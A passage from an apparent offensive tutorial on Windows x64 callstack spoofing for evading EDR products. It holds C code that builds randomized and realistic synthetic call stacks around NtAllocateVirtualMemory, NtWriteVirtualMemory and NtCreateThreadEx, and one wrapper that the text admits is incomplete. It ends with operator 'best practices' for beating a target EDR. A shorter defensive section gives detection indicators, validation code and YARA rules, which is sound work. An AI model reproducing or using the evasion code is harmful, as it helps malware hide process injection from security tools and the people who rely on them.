    PSPOOF_STACK pStack,
    PGADGET_COLLECTION pGadgets,
    HANDLE ProcessHandle,
    PVOID* BaseAddress,
    ULONG_PTR ZeroBits,
    PSIZE_T RegionSize,
    ULONG AllocationType,
    ULONG Protect
) {
    // Get the target function
    typedef NTSTATUS (NTAPI* fnNtAllocateVirtualMemory)(
        HANDLE, PVOID*, ULONG_PTR, PSIZE_T, ULONG, ULONG
    );

    fnNtAllocateVirtualMemory pNtAlloc =
        (fnNtAllocateVirtualMemory)GetProcAddress(
            GetModuleHandleW(L"ntdll.dll"),
            "NtAllocateVirtualMemory"
        );

    // Build spoofed stack with 5 frames
    BuildSyntheticStack(pStack, pGadgets, _ReturnAddress(), 5);

    // Make the call with spoofed stack.
    // Incomplete as written: SpoofedCall forwards only four arguments to
    // the target, but NtAllocateVirtualMemory takes six, so AllocationType
    // and Protect are never passed and the target reads whatever occupies
    // those stack slots.
    return SpoofedCall(
        pStack,
        pNtAlloc,
        (PVOID)ProcessHandle,
        (PVOID)BaseAddress,
        (PVOID)ZeroBits,
        (PVOID)RegionSize
    );
}

Part 7: Advanced Techniques

Randomization for Evasion

Static spoofed stacks create detectable patterns. Randomizing frame count and gadget selection helps evade signature-based detection.

#include <windows.h>

// Generate pseudo-random numbers without suspicious RNG calls
DWORD GetPseudoRandom(void) {
    LARGE_INTEGER li;
    QueryPerformanceCounter(&li);
    return (DWORD)(li.QuadPart ^ (li.QuadPart >> 17));
}

// Build randomized synthetic stack
PVOID BuildRandomizedStack(
    PSPOOF_STACK pStack,
    PGADGET_COLLECTION pGadgets,
    PVOID pRealReturn
) {
    // Random frame count between 4 and 10
    DWORD dwRandom = GetPseudoRandom();
    DWORD dwFrameCount = 4 + (dwRandom % 7);

    // Build with random frame count
    PBYTE pCurrent = pStack->bMemory + sizeof(pStack->bMemory);
    pCurrent -= 256;
    pCurrent = (PBYTE)((ULONG_PTR)pCurrent & ~0xF);

    PVOID pNextRbp = NULL;

    for (DWORD i = 0; i < dwFrameCount; i++) {
        // Random gadget selection
        DWORD dwGadgetIdx = (GetPseudoRandom() + i) % pGadgets->dwCount;
        PVOID pGadget = pGadgets->pGadgets[dwGadgetIdx];

        // Random shadow space padding (still 32+ bytes)
        DWORD dwPadding = 32 + (GetPseudoRandom() % 32);
        pCurrent -= dwPadding;

        // Return address
        pCurrent -= 8;
        *(PVOID*)pCurrent = (i == 0) ? pRealReturn : pGadget;

        // Saved RBP
        pCurrent -= 8;
        *(PVOID*)pCurrent = pNextRbp;
        pNextRbp = pCurrent;
    }

    pStack->pStackTop = pCurrent;
    return pCurrent;
}

Matching Expected Call Chains

The most sophisticated spoofing mimics the exact call chain that legitimate API calls produce:

#include <windows.h>

// Known API call chain patterns
typedef struct _CALL_CHAIN {
    const char* szApiName;
    const wchar_t* wszModuleChain[8]; // Module names in order
} CALL_CHAIN, *PCALL_CHAIN;

// Example known patterns
CALL_CHAIN g_KnownChains[] = {
    {
        "NtAllocateVirtualMemory",
        { L"ntdll.dll", L"kernelbase.dll", L"kernel32.dll", NULL }
    },
    {
        "NtWriteVirtualMemory",
        { L"ntdll.dll", L"kernelbase.dll", L"kernel32.dll", NULL }
    },
    {
        "NtCreateThreadEx",
        { L"ntdll.dll", L"kernelbase.dll", L"kernel32.dll", NULL }
    },
    { NULL, { NULL } }
};

// Build stack matching a specific API's expected chain
BOOL BuildRealisticChain(
    PSPOOF_STACK pStack,
    const char* szTargetApi,
    PVOID pRealReturn
) {
    // Find the expected chain
    PCALL_CHAIN pChain = NULL;
    for (int i = 0; g_KnownChains[i].szApiName; i++) {
        if (strcmp(g_KnownChains[i].szApiName, szTargetApi) == 0) {
            pChain = &g_KnownChains[i];
            break;
        }
    }

    if (!pChain) return FALSE;

    // Build stack with gadgets from the correct modules in order
    PBYTE pCurrent = pStack->bMemory + sizeof(pStack->bMemory);
    pCurrent -= 256;
    pCurrent = (PBYTE)((ULONG_PTR)pCurrent & ~0xF);

    PVOID pNextRbp = NULL;
    BOOL bFirstFrame = TRUE;

    for (int i = 0; pChain->wszModuleChain[i]; i++) {
        HMODULE hMod = GetModuleHandleW(pChain->wszModuleChain[i]);
        if (!hMod) continue;

        PVOID pGadget = FindRetGadget(hMod);
        if (!pGadget) continue;

        // Build frame
        pCurrent -= 32;  // Shadow space
        pCurrent -= 8;   // Return address
        *(PVOID*)pCurrent = bFirstFrame ? pRealReturn : pGadget;
        bFirstFrame = FALSE;

        pCurrent -= 8;   // Saved RBP
        *(PVOID*)pCurrent = pNextRbp;
        pNextRbp = pCurrent;
    }

    pStack->pStackTop = pCurrent;
    return TRUE;
}

Part 8: Defense and Detection

Understanding detection helps both defenders and offensive operators. Here are the key indicators of stack spoofing:

Detection Indicators

STACK SPOOFING DETECTION CHECKLIST
==================================

┌────────────────────────────────────────────────────────────────────┐
│ INDICATOR                        │ DETECTION METHOD               │
├──────────────────────────────────┼────────────────────────────────┤
│ RSP outside thread stack limits  │ Compare RSP to TEB stack info  │
│                                  │ GetCurrentThreadStackLimits()  │
├──────────────────────────────────┼────────────────────────────────┤
│ All returns to RET gadgets       │ Disassemble at each return     │
│                                  │ address; check if just "ret"   │
├──────────────────────────────────┼────────────────────────────────┤
│ Return not after CALL            │ Check bytes before return addr │
│                                  │ for a CALL encoding (E8 rel32, │
│                                  │ FF /2 indirect)                │
├──────────────────────────────────┼────────────────────────────────┤
│ Missing RUNTIME_FUNCTION         │ RtlLookupFunctionEntry returns │
│                                  │ NULL for return addresses      │
├──────────────────────────────────┼────────────────────────────────┤
│ Impossible call chain            │ Cross-reference known API      │
│                                  │ calling patterns               │
├──────────────────────────────────┼────────────────────────────────┤
│ Uniform frame sizes              │ Measure distance between saved │
│                                  │ RBP values; too regular?       │
└────────────────────────────────────────────────────────────────────┘
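The last row of the table is easy to express in code once the saved RBP values have been collected. A minimal sketch, assuming the walker has already gathered the chain's RBP values innermost first (FrameGapsUniform is an illustrative name):

```c
#include <stddef.h>
#include <stdint.h>

/* Heuristic for the "uniform frame sizes" row: given RBP values collected
 * while walking a frame-pointer chain (innermost frame first), report
 * whether every gap between consecutive frames is identical. Real call
 * chains mix functions with different frame sizes, so identical gaps
 * across several frames hint at a generated stack. At least three frames
 * (two gaps) are required before the check reports anything. */
int FrameGapsUniform(const uint64_t* rbps, size_t count) {
    if (count < 3)
        return 0;
    uint64_t gap = rbps[1] - rbps[0];
    for (size_t i = 2; i < count; i++) {
        if (rbps[i] - rbps[i - 1] != gap)
            return 0;   /* frame sizes vary: looks like a real chain */
    }
    return 1;
}
```

BuildSyntheticStack in Part 5 places consecutive frames exactly 0x30 bytes apart (32 bytes of shadow space plus the saved-RBP and return-address slots), so its output trips this check. Legitimate recursion can also produce identical gaps, so treat a hit as one signal to weigh rather than a verdict.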

Validation Code

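#include <windows.h>
#include <stdio.h>

// THREAD_BASIC_INFORMATION is not declared in the public SDK headers; this is
// the commonly used layout (CLIENT_ID expanded to its two HANDLE fields).
typedef struct {
    LONG      ExitStatus;
    PVOID     TebBaseAddress;
    HANDLE    UniqueProcess;
    HANDLE    UniqueThread;
    ULONG_PTR AffinityMask;
    LONG      Priority;
    LONG      BasePriority;
} THREAD_BASIC_INFO;

typedef LONG (NTAPI *PFN_NT_QUERY_INFORMATION_THREAD)(HANDLE, ULONG, PVOID, ULONG, PULONG);

// Read the stack bounds from the TEB of the *target* thread. NtCurrentTeb()
// would return the caller's TEB instead. The TEB is dereferenced directly,
// so hThread must belong to the current process.
static BOOL GetThreadStackBounds(HANDLE hThread, DWORD64* pBase, DWORD64* pLimit) {
    PFN_NT_QUERY_INFORMATION_THREAD pNtQIT = (PFN_NT_QUERY_INFORMATION_THREAD)
        GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtQueryInformationThread");
    THREAD_BASIC_INFO tbi = { 0 };

    if (!pNtQIT || pNtQIT(hThread, 0 /* ThreadBasicInformation */,
                          &tbi, sizeof(tbi), NULL) < 0) {
        return FALSE;
    }
    NT_TIB* pTib = (NT_TIB*)tbi.TebBaseAddress;
    *pBase  = (DWORD64)pTib->StackBase;
    *pLimit = (DWORD64)pTib->StackLimit;
    return TRUE;
}

// Check whether a thread's stack appears to be spoofed. hThread must be
// another thread in this process (GetThreadContext does not return a valid
// context for the calling thread), opened with THREAD_SUSPEND_RESUME,
// THREAD_GET_CONTEXT and THREAD_QUERY_INFORMATION access.
BOOL DetectStackSpoof(HANDLE hThread) {
    DWORD64 dwStackBase, dwStackLimit;
    CONTEXT ctx = { 0 };
    BOOL bSpoofed = FALSE;
    int nGadgetReturns = 0;

    // Get legitimate stack boundaries
    if (!GetThreadStackBounds(hThread, &dwStackBase, &dwStackLimit)) {
        return FALSE;
    }

    // Freeze the thread so its registers and stack stay consistent while read.
    // Note: printf while it is suspended can deadlock if the target holds the
    // CRT output lock; a production tool would defer output until after resuming.
    if (SuspendThread(hThread) == (DWORD)-1) {
        return FALSE;
    }

    ctx.ContextFlags = CONTEXT_FULL;
    if (!GetThreadContext(hThread, &ctx)) {
        goto done;
    }

    // Check 1: RSP within stack limits
    if (ctx.Rsp < dwStackLimit || ctx.Rsp >= dwStackBase) {
        printf("[!] RSP (0x%llX) outside stack bounds!\n", ctx.Rsp);
        bSpoofed = TRUE;
        goto done;
    }

    // Walk frames with unwind data rather than RBP: x64 Windows code does not
    // generally maintain an RBP frame chain, so RBP may hold any value.
    for (int nFrames = 0; nFrames < 20 && ctx.Rip != 0; nFrames++) {
        DWORD64 dwImageBase = 0;
        PRUNTIME_FUNCTION pRtFunc = RtlLookupFunctionEntry(ctx.Rip, &dwImageBase, NULL);

        if (pRtFunc) {
            PVOID pHandlerData = NULL;
            DWORD64 dwEstablisherFrame = 0;
            RtlVirtualUnwind(UNW_FLAG_NHANDLER, dwImageBase, ctx.Rip, pRtFunc,
                             &ctx, &pHandlerData, &dwEstablisherFrame, NULL);
        } else if (nFrames == 0) {
            // Leaf function at the top of the stack: return address is at [RSP]
            ctx.Rip = *(DWORD64*)ctx.Rsp;
            ctx.Rsp += 8;
        } else {
            // A return address lies inside a function that made a call, so it is
            // never a leaf: missing unwind data usually means unbacked code
            // (or JIT code without registered function tables)
            printf("[!] Frame %d: no RUNTIME_FUNCTION for 0x%llX\n", nFrames, ctx.Rip);
            bSpoofed = TRUE;
            break;
        }

        if (ctx.Rip == 0) {
            break;  // Reached the bottom of the stack
        }

        // Check 2: the caller's frame must stay inside the thread's stack
        if (ctx.Rsp < dwStackLimit || ctx.Rsp >= dwStackBase) {
            printf("[!] Frame %d: RSP outside stack\n", nFrames);
            bSpoofed = TRUE;
            break;
        }

        // Check 3: does the return address point directly at a bare RET?
        __try {
            if (*(BYTE*)ctx.Rip == 0xC3) {
                nGadgetReturns++;
            }
        }
        __except (EXCEPTION_EXECUTE_HANDLER) {}
    }

    // Heuristic: multiple returns to a bare RET are suspicious
    if (!bSpoofed && nGadgetReturns > 2) {
        printf("[!] %d frames return to RET gadgets!\n", nGadgetReturns);
        bSpoofed = TRUE;
    }

done:
    ResumeThread(hThread);
    return bSpoofed;
}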
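The validation routine counts returns to bare RET instructions but does not implement the "Uniform frame sizes" row of the checklist. One possible sketch, assuming the walker has already collected the stack address of each frame (innermost first, for example the RSP after each unwind step or each saved RBP), is to flag chains in which every frame has exactly the same size. The helper name and the exact-equality test are illustrative assumptions; a real detector might allow a tolerance or use a statistical measure instead.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical helper for the "uniform frame sizes" indicator.
   frames[] holds the stack address of each frame, innermost first, so the
   values must increase. Returns true when every frame has exactly the same
   size. minFrames keeps short stacks, which can be regular by chance, from
   being flagged. */
bool FrameSizesTooUniform(const uint64_t *frames, size_t count, size_t minFrames) {
    if (count < 3 || count < minFrames) return false;
    if (frames[1] <= frames[0]) return false;         /* broken chain: a different indicator */
    uint64_t size = frames[1] - frames[0];
    for (size_t i = 2; i < count; i++) {
        if (frames[i] <= frames[i - 1]) return false;  /* broken chain */
        if (frames[i] - frames[i - 1] != size) return false;  /* sizes differ */
    }
    return true;  /* every frame has the same size */
}
```

For example, frames at 0x1000, 0x1030, 0x1060 and 0x1090 with minFrames set to 4 are flagged (every frame is 0x30 bytes), while a chain containing one differently sized frame is not.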

YARA Detection Rules

rule Callstack_Spoof_Gadget_Search {
    meta:
        description = "Detects code that searches for RET gadgets"

    strings:
        // Comparing a byte against 0xC3 (RET)
        $gadget_search1 = { 80 ?? C3 }  // cmp byte [reg], 0xC3 (loose: any 80-group op)
        $gadget_search2 = { 3C C3 }     // cmp al, 0xC3

        // Comparing a word against 0xC35D (bytes 5D C3: pop rbp; ret)
        $gadget_search3 = { 66 81 ?? 5D C3 }  // cmp word [reg], 0xC35D

        // RtlLookupFunctionEntry for validation bypass
        $unwind_api = "RtlLookupFunctionEntry" ascii

        // Stack limit checking (possible evasion)
        $stack_check = "NtQueryInformationThread" ascii

    condition:
        // The short byte patterns are common on their own, so require an API
        // string as corroboration (this also references every declared string,
        // which YARA requires)
        any of ($gadget_search*) and ($unwind_api or $stack_check)
}

rule Suspicious_Stack_Manipulation {
    meta:
        description = "Detects unusual stack pointer manipulation"

    strings:
        // Direct RSP assignment (stack switching)
        $rsp_mov1 = { 48 8B E? }        // mov rsp, reg (rax..rdi)
        $rsp_mov2 = { 48 8B ( 20 | 21 | 22 | 23 | 26 | 27 ) }  // mov rsp, [reg]

        // RBP chain manipulation
        $rbp_chain = { 48 89 ( 28 | 29 | 2A | 2B | 2E | 2F ) }  // mov [reg], rbp

        // Get return address pattern
        $ret_addr = { 48 8B 04 24 }     // mov rax, [rsp]

    condition:
        2 of them
}

Summary: The Stack Spoofing Toolkit

Callstack spoofing is a sophisticated technique that exploits the gap between how EDRs analyze execution context and how that context can be artificially constructed.

TECHNIQUE EFFECTIVENESS SUMMARY
===============================

┌────────────────────────────────┬────────────┬────────────┬─────────────┐
│ Technique                      │ Complexity │ Stealth    │ Robustness  │
├────────────────────────────────┼────────────┼────────────┼─────────────┤
│ Simple return addr replacement │ Low        │ Low        │ Low         │
│ RET gadget chains              │ Medium     │ Medium     │ Medium      │
│ Full synthetic frames          │ High       │ High       │ High        │
│ Realistic call chains          │ Very High  │ Very High  │ High        │
│ + Randomization                │ Very High  │ Very High  │ Very High   │
└────────────────────────────────┴────────────┴────────────┴─────────────┘

Best Practices:

Use gadgets from multiple trusted system modules
Build frames matching expected API call patterns
Randomize frame count and gadget selection per call
Maintain valid RBP chains through synthetic frames
Test against target EDR's specific stack analysis
Consider RUNTIME_FUNCTION implications for advanced EDRs

References

Windows x64 Calling Convention (Microsoft Documentation)
PE Format: Exception Directory and RUNTIME_FUNCTION
"Windows Internals" by Russinovich, Solomon, Ionescu
Research: "Bypassing User-Mode Hooks and Direct Syscall Detection"
MITRE ATT&CK: T1055 (Process Injection techniques)
